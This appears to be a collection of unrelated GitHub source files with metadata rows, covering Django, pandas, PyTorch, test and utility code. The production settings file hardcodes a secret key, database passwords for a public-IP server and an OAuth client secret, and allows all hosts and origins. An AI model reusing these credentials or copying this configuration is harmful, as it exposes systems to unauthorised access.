obj_box = objs[obj_ind]
related_mask = self.fill_mask(related_mask, obj_box, method='fill')
# image = relation_mask_visualization(image, related_mask, kp, human_box)
# cv2.imshow('res', image)
# cv2.waitKey(0)
positive_positions, negative_positions = self.transform_to_relate_vec(related_mask, self.stride)
positive_positions, negative_positions = self.balance_vecs(positive_positions, negative_positions)
positive_data = [
self.graph_data_handle(self.related_vec(kp, human_box, pos), 1) for pos in positive_positions
]
negative_data = [
self.graph_data_handle(self.related_vec(kp, human_box, pos), 0) for pos in negative_positions
]
all_positive_datas.extend(positive_data)
all_negative_datas.extend(negative_data)
datas = all_positive_datas + all_negative_datas
random.shuffle(datas)
self.datas = datas
| [
"icicle4@icloud.com"
] | icicle4@icloud.com |
f5dbebfd08d2bedf77c3816adce2bd252fdfde3b | 629efe629347d3b3ee3857ff29f6c615a9e51115 | /transport/migrations/0017_auto_20200508_0418.py | ae35b7b9b8fae2ffefd615e9d40463ee3587c4e0 | [] | no_license | abdulhanan/wsite | 8a56bd873241c5c13295da33eddf930f10a0ad6c | f6dbb69139f5ce3b53a598086fe2fcd79483467e | refs/heads/master | 2022-06-21T11:45:04.684861 | 2020-05-12T00:55:56 | 2020-05-12T00:55:56 | 263,194,927 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | # Generated by Django 3.0.5 on 2020-05-07 23:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('transport', '0016_auto_20200508_0414'),
]
operations = [
migrations.AlterField(
model_name='transportbooking',
name='transport',
field=models.CharField(blank=True, max_length=50),
),
]
| [
"11beseahanan@seecs.edu.pk"
] | 11beseahanan@seecs.edu.pk |
0a1469a82f87c708f4fe024503284be3397f152d | 3d669e500ba485fc4520a2aca3ff6bd94bd9a87e | /LAB2/converter.py | 758071a22ff3b144454cc6afe972bc6814abbdbc | [] | no_license | LuisAlvelaMendes/CMO | 7b7d78f1e0b373990a39a6da237987c5ab512248 | 85e8fca7dae27674ca08e3f8ac1cb8903b4e1ed6 | refs/heads/master | 2021-03-16T11:32:12.498058 | 2020-04-12T20:51:19 | 2020-04-12T20:51:19 | 246,901,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,275 | py | """
Range 60,0dB -120,0dBm
Mobile unit 1 Mobile Terminal 00,00000 000,00000 0,0
Fixed unit 2 Monte da Virgem 41,11313 -008,59838 200,1
Fixed unit 3 Sardoura 41,04918 -008,31171 316,6
Fixed unit 4 Resende 41,13410 -007,98018 552,6
Fixed unit 7 Exercise3Celorico 41,33887 -007,84056 1301,0
Fixed unit 8 Exercise3Felgueiras 41,32088 -008,28529 502,6
"""
import pandas as pd
from pandas import ExcelWriter
from pandas import ExcelFile
df = pd.read_excel('question3/exercise3.xlsx', sheet_name='Sheet2')
""" histogram
import matplotlib.pyplot as plt
powersReceived = df['Pr(dBm)']
powersReceived.hist(normed=0, histtype='stepfilled', bins=20)
plt.xlabel('Power Received (dBm)',fontsize=15)
plt.ylabel('Samples',fontsize=15)
plt.show()
"""
""" scatter plots
plt.subplot(1,2,1)
plt.scatter(df['BestUnit'], df['Pr(dBm)'],color='b',s=120, linewidths=2,zorder=10)
plt.xlabel('Unit',fontsize=15)
plt.ylabel('Power Received (dBm)',fontsize=15)
plt.gcf().set_size_inches((20,6))
"""
"""
used for exercises 1, 2 and 3
"""
lessThan120 = df[(df['Pr(dBm)'] < -120)]
lessThan110 = df[(df['Pr(dBm)'] < -110)]
print("Percentagem Pr < -120:",(len(lessThan120.index))/float(len(df.index)) * 100)
print("Percentagem Pr < -110:",(len(lessThan110.index))/float(len(df.index)) * 100)
between0and10 = df[(df['Rx(dB)'] < 10) & (df['Rx(dB)'] >= 0)]
between10and20 = df[(df['Rx(dB)'] < 20) & (df['Rx(dB)'] >= 10)]
between20and30 = df[(df['Rx(dB)'] < 30) & (df['Rx(dB)'] >= 20)]
between30and40 = df[(df['Rx(dB)'] < 40) & (df['Rx(dB)'] >= 30)]
between40and50 = df[(df['Rx(dB)'] < 50) & (df['Rx(dB)'] >= 40)]
between50and60 = df[(df['Rx(dB)'] < 60) & (df['Rx(dB)'] >= 50)]
above60 = df[(df['Rx(dB)'] >= 60)]
print("Percentagem maior: ", (len(between20and30.index))/float(len(df.index)) * 100)
"""
used for exercise 4
"""
newSitesAsBestUnit = df[(df['BestUnit'] == 8) | (df['BestUnit'] == 7)]
siteAsBestUnit7 = df[(df['BestUnit'] == 7)]
siteAsBestUnit8 = df[(df['BestUnit'] == 8)]
print("Locations with new sites as best unit:", len(newSitesAsBestUnit.index))
print("Locations with site 7 as best unit (celorico):", len(siteAsBestUnit7.index))
print("Locations with site 8 as best unit (felgueiras):", len(siteAsBestUnit8.index)) | [
"noreply@github.com"
] | LuisAlvelaMendes.noreply@github.com |
a170f3cdb43383b1106e3eac04e7a20a7ae1edc5 | b3136ce22bf1a2025864463b08e1bf2b404e810c | /uuthenguyento.py | 5b141670540eb3df25082642530e905ed0504660 | [] | no_license | Keybinhoainam/Python | 21c02664b24fbaad881f54a6ded31546af05ea6f | 1d3555934cfe668618bf7fb8dfdfb8017867c320 | refs/heads/master | 2023-08-28T15:32:55.829094 | 2021-11-05T15:10:17 | 2021-11-05T15:10:17 | 401,331,306 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 467 | py | import math
def kt(vtnt):
n=10000
check=[0]*(n+5)
for i in range(2,n+1):
if(check[i]==0):
vtnt.append(i)
j=i*i
while(j<=n):
check[j]=1
j+=i
test=int(input())
for t in range(test):
s=input()
vtnt=[]
snt=['2','3','5','7']
kt(vtnt)
n=len(s)
dem=0
for i in s:
if(i in snt):dem+=1
if(n in vtnt and dem>(n-dem)):print("YES")
else:print("NO") | [
"keybinhoainam@gmail.com"
] | keybinhoainam@gmail.com |
e50c5b58cede70ff4ee4e99a6462a2a0bfa66ebb | 1c390cd4fd3605046914767485b49a929198b470 | /leetcode/number-of-ways-to-reorder-array-to-get-same-bst.py | 20d18c287b19a6543b31a2e3550bee7c771d1829 | [] | no_license | wwwwodddd/Zukunft | f87fe736b53506f69ab18db674311dd60de04a43 | 03ffffee9a76e99f6e00bba6dbae91abc6994a34 | refs/heads/master | 2023-01-24T06:14:35.691292 | 2023-01-21T15:42:32 | 2023-01-21T15:42:32 | 163,685,977 | 7 | 8 | null | null | null | null | UTF-8 | Python | false | false | 320 | py | class Solution:
def numOfWays(self, a: List[int]) -> int:
z = factorial(len(a))
def F(a):
nonlocal z
if a:
z //= len(a)
F([i for i in a if i < a[0]])
F([i for i in a if i > a[0]])
F(a)
return (z - 1) % 1000000007 | [
"wwwwodddd@gmail.com"
] | wwwwodddd@gmail.com |
b5ddde85e380c31b0774555e01f85bf4d5760467 | 5cfd0d94d25e617c8a39bac4e73fa37125ed2c2d | /DGM/models/modifiedgooglenet.py | 0f76dc1a5e4211650f04e9323227d067da3c1d80 | [] | no_license | boyuanmike/Adversarial-Metric-Learning | f6c37e641f93ae971ee11024f27ae1c5d5c1dff3 | 59be862f3f113d45d1edf39b5d88eb9168adc6f0 | refs/heads/master | 2020-04-30T12:28:37.263588 | 2019-04-30T04:27:35 | 2019-04-30T04:27:35 | 176,827,443 | 6 | 1 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | # This file is the pytorch implementation of https://github.com/duanyq14/DAML/blob/master/lib/models/modified_googlenet.py
import torch
import torch.nn as nn
from models.google_net import googlenet
class ModifiedGoogLeNet(nn.Module):
def __init__(self, out_dims=64, normalize_output=False):
super(ModifiedGoogLeNet, self).__init__()
self.googlenet = googlenet(pretrained=True)
self.googlenet.fc = nn.Linear(in_features=1024, out_features=out_dims)
self.normalize_output = normalize_output
def forward(self, x):
if self.training and self.googlenet.aux_logits:
*_, y = self.googlenet(x)
else:
y = self.googlenet(x)
if self.normalize_output:
y_norm = torch.norm(y, p=2, dim=1, keepdim=True)
y = y / y_norm.expand_as(y)
return y
| [
"noreply@github.com"
] | boyuanmike.noreply@github.com |
9dbbb0c7a4050d651f17d49dbb915c95b9882ed3 | d3e1472a78922f221721fad914fdf3278ce5d10f | /ServiciosParlamentarios/environments/prod/settings.py | d4a4071bdc34fba298e9b3dc91e89fdc84bda60a | [] | no_license | gdebenedetti/spd-back-end | 76b9ec2cb7b630855e8729b8ac5d199ba8abfcc0 | 4163d615876316945912a5f9cbbd5005d334678c | refs/heads/master | 2021-01-24T02:38:40.925036 | 2016-01-08T19:01:41 | 2016-01-08T19:01:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,443 | py | """
Django settings for ServiciosParlamentarios project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from datetime import date
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'c8qmje5ow7r5e)uri*t^baev!*rw-a&z*=om5&op&pn872h&!5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
TEMPLATE_DEBUG = False
ALLOWED_HOSTS = ['*',]
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'corsheaders',
'sslserver',
'apirest',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware',
)
CORS_ORIGIN_ALLOW_ALL = True
ROOT_URLCONF = 'ServiciosParlamentarios.urls'
WSGI_APPLICATION = 'ServiciosParlamentarios.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'servicios', #name of the django database
'USER': 'postgres', #user of the django database
'PASSWORD': 'hLsPLeYRSR', #password of the django database
'HOST': 'localhost',
'PORT': '5432',
},
'pap_nueva_pruebas': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'dp_prod', #PROD
'USER': 'postgres',
'PASSWORD': 'XBdFBU3hDGZe',
'HOST': '186.33.210.54',
'PORT': '5432',
},
'pap_nueva_pruebas_test': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'dp_prod_test', #TEST
'USER': 'postgres',
'PASSWORD': 'XBdFBU3hDGZe',
'HOST': '186.33.210.54',
'PORT': '5432',
}
}
# This is defined here as a do-nothing function because we can't import
# django.utils.translation -- that module depends on the settings.
gettext_noop = lambda s: s
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'es'
TIME_ZONE = 'America/Argentina/Buenos_Aires'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LANGUAGES = (
('es', gettext_noop('Spanish')),
)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
# 'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAdminUser',),
# 'DEFAULT_PERMISSION_CLASSES': ('apirest.authorizers.authorizator.has_permission',),
'DEFAULT_FILTER_BACKENDS': (
'rest_framework.filters.DjangoFilterBackend',
'rest_framework.filters.SearchFilter',
'rest_framework.filters.OrderingFilter',
), #pip install django-filter
'DEFAULT_RENDERER_CLASSES': (
'apirest.utils.JSONURenderer.JSONURenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'PAGINATE_BY': 20,
'PAGINATE_BY_PARAM': 'page_size',
'MAX_PAGINATE_BY': 100
}
DATABASE_ROUTERS = ['apirest.routers.apirest_router.ApirestRouter','apirest.routers.default_router.DefaultRouter']
# Authentication Server
AUTH_SERVER = {
'HOST': 'oauth2.hcdn.gob.ar',
'PORT': '9000',
'RESOURCE_NAME': 'servicios-parlamentarios',
}
# Oauth2 client credentials
AUTH_CLIENT_CREDENTIALS = {
'CLIENT_ID': '=yEvTDB6GU34syMA0n63RD8OQxgCec6w32KDC9Am',
'CLIENT_SECRET': '4BxxY7C4_jM!l4JlYe!1f;LuFRMf=!M;iabG;Mjad:hmnZ.Ma.Go=@9hYqIc5fwKAWg=rr_fxXW6bAP-iRUoZrTDK!fILZ;1u-nf@@ksDHKlX;k!h2jrGMQJ;F70!abw',
}
AUTHENTICATION = True
from datetime import datetime
LOGGING = {
'version': 1,
'formatters': {
'verbose': {
'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt' : "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': '/var/log/ServiciosParlamentarios/' + datetime.now().strftime('ServiciosParlamentarios_%d_%m_%Y.log'),
'formatter': 'verbose'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
},
'loggers': {
'django': {
'level': 'DEBUG',
'handlers': ['file'],
'propagate': True
},
'apirest': {
'level': 'DEBUG',
'handlers': ['file'],
'level': 'DEBUG',
'propagate': True
},
},
}
| [
"giopromolla@gmail.com"
] | giopromolla@gmail.com |
4d39a6fff8aa5c95aaf2abec67e4ef353428512e | 0e78b0dd8a27820500ab94308fbf7f45da451d47 | /Python/100 challenges/day 9 -301- 37/c35 - print last five square list.py | 802bad34c82eff4b2b0db1718d5c336d03403954 | [] | no_license | RLeary/projects | afc1d567fbddcc29ff1b0f65938b42d59b145636 | c55cf6d4ee60d2d2f5b647e870c07b5a88d58f7d | refs/heads/master | 2020-12-05T12:03:46.546716 | 2020-03-11T14:32:30 | 2020-03-11T14:32:30 | 232,103,586 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 788 | py | # Define a function which can generate a list where the values are square of
# numbers between 1 and 20 (both included). Then the function needs to print
# the last 5 elements in the list.
#
# Hints:
# Use ** operator to get power of a number.Use range() for loops.Use
# list.append() to add values into a list.Use [n1:n2] to slice
LOWER_LIMIT = 1
UPPER_LIMIT = 21
def print_square_list_last_five():
sqaure_list = [i ** 2 for i in range(LOWER_LIMIT, UPPER_LIMIT)]
print(sqaure_list[-5:])
print_square_list_last_five()
# Given solutions
"""
def printList():
li=list()
for i in range(1,21):
li.append(i**2)
print(li[-5:])
printList()
# OR
def printList():
lst = [i ** 2 for i in range(1, 21)]
for i in range(19,14,-1):
print(lst[i])
printList()
"""
| [
"ruaraidh@live.com"
] | ruaraidh@live.com |
d84008737b9bd1f9dcb63e284d0f2f7a674116bc | d880b55d45726a9b9b12d24b059769350eeb6fb6 | /app/tests/test_eventactions.py | 0d49b3c282c0d5aaafc4cee1e7dc907315c8b1b1 | [
"Apache-2.0"
] | permissive | twatchy/cito_engine | 261a0bbf0dbdf1fe8cca19f598972307bc7df1c7 | a62dce3c76567dd36b7efcaa70e03728b335f44e | refs/heads/master | 2020-04-21T11:36:25.187256 | 2016-11-01T03:37:13 | 2016-11-01T03:37:13 | 169,531,529 | 0 | 0 | Apache-2.0 | 2019-02-07T06:57:48 | 2019-02-07T06:57:43 | Python | UTF-8 | Python | false | false | 4,329 | py | """Copyright 2014 Cyrus Dasadia
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from time import time
from mock import patch, call
from django.test import TestCase
from cito_engine.models import Incident, IncidentLog, EventActionCounter
from cito_engine.poller.event_poller import EventPoller
from . import factories
class TestEventActions(TestCase):
"""
X = 2, Y=100
Case 1
* One incident in T secs
* 2nd at T+10, 3rd at T+11, 4th at T+51
* Assert we have 1 single incident, 4 logs and event action executed once
* 5th incident occurs at T+101
* Assert counters are reset
* 6th incident occurs at T+151
* Assert event action is executed for the second time
"""
def setUp(self):
self.event = factories.EventFactory.create()
self.eventaction = factories.EventActionFactory.create(event=self.event,threshold_count=2, threshold_timer=100)
@patch('cito_engine.actions.incidents.requests')
def test__single_event_action_execution(self, mock_requests):
T = int(time())
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (self.event.id, T)
eventpoller = EventPoller()
self.assertTrue(eventpoller.parse_message(raw_incident))
incident = Incident.objects.filter()[0]
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertFalse(eacounter.is_triggered)
# 2nd incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T+10)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
#3rd incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 11)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
# 4th incident
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 51)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
#We should have one incident and 4 incident logs
self.assertEqual(Incident.objects.count(), 1)
self.assertEqual(IncidentLog.objects.count(), 4)
# Assert we only execute plugin once
self.assertEqual(mock_requests.post.call_count, 1)
# 5th incident after time window
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 101)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertFalse(eacounter.is_triggered)
# Assert we did not execute plugin yet
self.assertEqual(mock_requests.post.call_count, 1)
# 6th incident after time window
raw_incident = '{ "event": {"eventid":"%s", "element":"foo", "message":"omgwtfbbq"}, "timestamp": %d}' % (
self.event.id, T + 121)
self.assertTrue(eventpoller.parse_message(raw_incident))
eacounter = EventActionCounter.objects.get(incident=incident)
self.assertTrue(eacounter.is_triggered)
# Assert event action occurred for the second time
self.assertEqual(mock_requests.post.call_count, 2)
#todo create tests to check use cases mentioned in the comments | [
"cyrus@extremeunix.com"
] | cyrus@extremeunix.com |
4394513dce3447ce23c63b1b1c2f1cb7e8496e66 | f2224bac9f28ec73b9f12719983af42524ad2b28 | /filehandeling.py | 573b70d92e37f8543ec233b8f0b97e67b1563da9 | [] | no_license | WeerakoonOS/Python-Codes-1st-sem | fd5b8c87fe8ed2828f88af2ead00cf5826120822 | 8251a7bbb837a4699c00dff511836142bbc6b1c4 | refs/heads/master | 2020-04-06T04:43:06.891945 | 2017-02-23T05:33:09 | 2017-02-23T05:33:09 | 82,888,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | file=open('f.txt','w')
file.write('My favorite subject is ICT\n')
file.write('My school is located in the western province\n')
file.write('My parents are providing expenses for my education\n')
file.close()
file1=open('f.txt','a')
file1.write('Sri Lanka is one of the beautiful country in the world\n')
file1.close()
file2=open('f.txt')
str1=file2.readline()
str2=file2.readline()
str3=file2.readline()
str4=file2.readline()
print(str1, str2, str3, str4)
file2.close()
file3=open('f.txt')
for line in file3:
print(line)
file3.close()
| [
"oswucsc@gmail.com"
] | oswucsc@gmail.com |
97881fac8f0fc31d32cb2dcfab394222d5961334 | 9bd6caf9c42ac67dfcb120af272d8e65d8f6a9f6 | /venv/bin/python-config | 473844071904928c2233c7ec06d5e3c88290dd42 | [] | no_license | haedal-with-knu/KNUstudents | f6da8e8c112af317addeb1cccaca9f3bfa6bcacc | 6fc88e5699cc27fbf9f7b6437d84b249e450232e | refs/heads/master | 2020-06-30T13:25:20.994394 | 2019-10-13T14:58:36 | 2019-10-13T14:58:36 | 200,837,311 | 1 | 6 | null | 2019-10-13T14:06:47 | 2019-08-06T11:24:16 | CSS | UTF-8 | Python | false | false | 2,360 | #!/Users/kangminchoi/haedal/KNUstudents/venv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
| [
"choikm3847@gmail.com"
] | choikm3847@gmail.com | |
61748d1f6e05bcad0eb600b0cbe6235327af080e | 3fbdf1a2672cc75607370ddc181cc67f145d1b65 | /actionScripts/toggleDemoMode.py | 957710b841713230f61c2e2b9e016e92b995994d | [] | no_license | aaronr22/HawKoin | f5706da59610437931346aed32b28cf80e315fd2 | d9174560dee9fbc211b3de1370fa515441e4ce32 | refs/heads/master | 2020-03-12T17:45:35.563987 | 2018-11-25T19:03:33 | 2018-11-25T19:03:33 | 130,744,026 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,494 | py | import json
import requests
import sys, getopt
def main(argv):
url = 'http://localhost:3000/api/org.hawkoin.network.DemoMode'
json_payload = {
'$class': 'org.hawkoin.network.DemoMode',
'id': 'activated'
}
try:
response = requests.post(url, json=json_payload)
status = response.status_code
if(status != 200):
json_string = response.text
parsed_json = json.loads(json_string)
statusCode = parsed_json['error']['statusCode']
if(statusCode == 500):
deleteResponse = requests.delete(url+'/activated')
if (deleteResponse.status_code == 204):
print('Successfully disabled demo mode')
#print(parsed_json['error']['message'])
elif (status == 200):
print('Successfully enabled demo mode')
except requests.exceptions.Timeout:
# Maybe set up for a retry, or continue in a retry loop
print("***Error***: Timeout")
except requests.exceptions.TooManyRedirects:
# Tell the user their URL was bad and try a different one
print("***Error***: URL is bad")
except requests.exceptions.RequestException as e:
# catastrophic error. bail.
print (e)
sys.exit(1)
except:
print("*** ERROR *** Unable to post Student")
if __name__ == '__main__':
main(sys.argv[1:])
| [
"mattaddessi@Matts-MacBook-Pro.local"
] | mattaddessi@Matts-MacBook-Pro.local |
b8b9956a5434afb4a9eb0572f601bb541e5995a5 | c13c732b767d4c71751b26aa89d6a17cb1c4bf51 | /adaboost.py | 4090e523f37ca05e1b247d7efb96556aceffd0ee | [] | no_license | gm19900510/Adaptive-Boosting-Classifier-for-Pedestrian-Attributes-Identification-with-Color-and-Texture-Feature | 092d9d61665e1cc5d2fc4227ff4fc1ce4a988836 | 6ad86870ed12fcc5ee4caf024914ca8990d18235 | refs/heads/master | 2020-04-18T16:43:22.410897 | 2018-09-06T09:39:28 | 2018-09-06T09:39:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,937 | py | import graphviz
import pydot
import time
import numpy as np
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from imblearn.under_sampling import RandomUnderSampler
from imblearn.combine import SMOTEENN
from sklearn.externals import joblib
from sklearn import tree
def training(X=None, y=None, estimator=1, output='adaboost_dir.pkl'):
rus = RandomUnderSampler(random_state=0)
#smote_enn = SMOTEENN(random_state=0)
#X_resampled, y_resampled = rus.fit_sample(X, y)
X_resampled, y_resampled = rus.fit_sample(X, y)
clf = AdaBoostClassifier(DecisionTreeClassifier(max_depth=1), n_estimators=estimator, algorithm='SAMME')
clf.fit(X_resampled, y_resampled)
#clf.fit(X, y)
clf.score(X_resampled, y_resampled)
joblib.dump(clf, output+".pkl")
return clf
def eval_score(classifier, X, y):
height = X.shape[0]
# T = 0, F = 1
result = np.zeros(5) # TN,FP,FN,TP, Acc
predicty = classifier.predict(X)
for i in range(0, height):
predicty_temp = predicty[i]
# y_temp = y[i, index]
y_temp = y[i]
if (y_temp == 0):
if (predicty_temp == 0):
result[0] = result[0] + 1
else:
result[1] = result[1] + 1
elif (y_temp == 1):
if (predicty_temp == 0):
result[2] = result[2] + 1
else:
result[3] = result[3] + 1
result[4] = classifier.score(X,y)
return result
def save(clf, filename):
joblib.dump(clf, filename)
def load(filename):
clf = joblib.load(filename)
return clf
def exportgraphviz(clf, output):
temp = 1
for estimator in clf.estimators_:
print(temp)
tree.export_graphviz(estimator, out_file=str(output) + str(temp) + '.dot')
temp = temp + 1
def estimatorweight(clf):
for weight in clf.estimator_weights_:
print(weight)
return clf.estimator_weights_
def estimatorerror(clf):
for error in clf.estimator_errors_:
print(error)
return clf.estimator_errors_
def gui_train(cf, mf, cv, wc, i_label):
X_array = []
if (cf != ""):
X_array = np.load(cf)
if (mf != ""):
mf = np.load(mf)
X_array = np.concatenate((X_array, mf), axis=1)
else:
X_array = mf
train_array = np.load("crossvalidation" + str(cv) + "/train_array.npy")
test_array = np.load("crossvalidation" + str(cv) + "/test_array.npy")
label_subset = np.load("labelsubset-cv5/AllLabelSubset.npy")
temp_result = np.zeros([cv, 4])
for k in range(0, cv):
X_train = X_array[train_array[k, :]]
X_test = X_array[test_array[k, :]]
y_train = label_subset[train_array[k, :], i_label]
y_test = label_subset[test_array[k, :], i_label]
# This point start calculating a computation time
start = time.time()
clf = training(X=X_train, y=y_train, estimator=wc)
end = time.time()
# end calculating
temp = eval_score(clf, X_test, y_test)
temp_result[k, :] = temp
result = np.mean(temp_result, axis=0)
result_string = "Time to training is " + str(end - start) + " milisecond /n"
result_string = result_string + "From " + str(y_test.shape[0]) + " Data Test the result is : /n"
result_string = result_string + "False True = " + str(result[0]) + "/n"
result_string = result_string + "False False = " + str(result[1]) + "/n"
result_string = result_string + "True False = " + str(result[2]) + "/n"
result_string = result_string + "True True = " + str(result[3]) + "/n"
"""" print("Time to training is "+str(end-start)+" milisecond")
print("From "+str(y_test.shape[0])+" Data Test the result is :")
print("False True = "+str(result[0]))
print("False False = "+str(result[1]))
print("True False = "+str(result[2]))
print("True True = "+str(result[3]))
"""
| [
"helmiagilachmani098@gmail.com"
] | helmiagilachmani098@gmail.com |
0cc996327080cef74cacd4ca115b5b1872936fa0 | 0e78b2df0fb93afc62684dece8ac05b700570248 | /BOJ/10833.py | 06f397ce5fd59451cdaa7e04768b716105b35bc1 | [] | no_license | ajy720/Algorithm | f1e2301327db09667ba011bc317c8f380707c25c | b141538802e9056f154ab91c816ad29500505f34 | refs/heads/master | 2022-05-06T21:37:05.780170 | 2022-04-23T09:25:52 | 2022-04-23T09:25:52 | 200,335,390 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | ans = 0
for _ in ' '*int(input()):
a, b = map(int, input().split())
ans += b % a
print(ans)
| [
"ajy720@gmail.com"
] | ajy720@gmail.com |
f6f725cc17fc1faf7eac0a28e5e4359dcb58b5a7 | 3c94e55a1f2a41bdebd7a174c84c560283754b92 | /coffeecoin_admin/wsgi.py | 86e4bf45b6775b5ca4142c8a61f54a6eb322d346 | [] | no_license | coinmenace/coffeecoin_admin | 2542bca5f186b117a4d2b90cdde7cdbfa7ad6f3b | 65ceaa4ffba319fac3286388b572d19cde646bb0 | refs/heads/master | 2020-03-27T04:15:57.482384 | 2018-08-24T01:22:39 | 2018-08-24T01:22:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | """
WSGI config for coffeecoin_admin project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "coffeecoin_admin.settings")
application = get_wsgi_application()
| [
"webframes@gmail.com"
] | webframes@gmail.com |
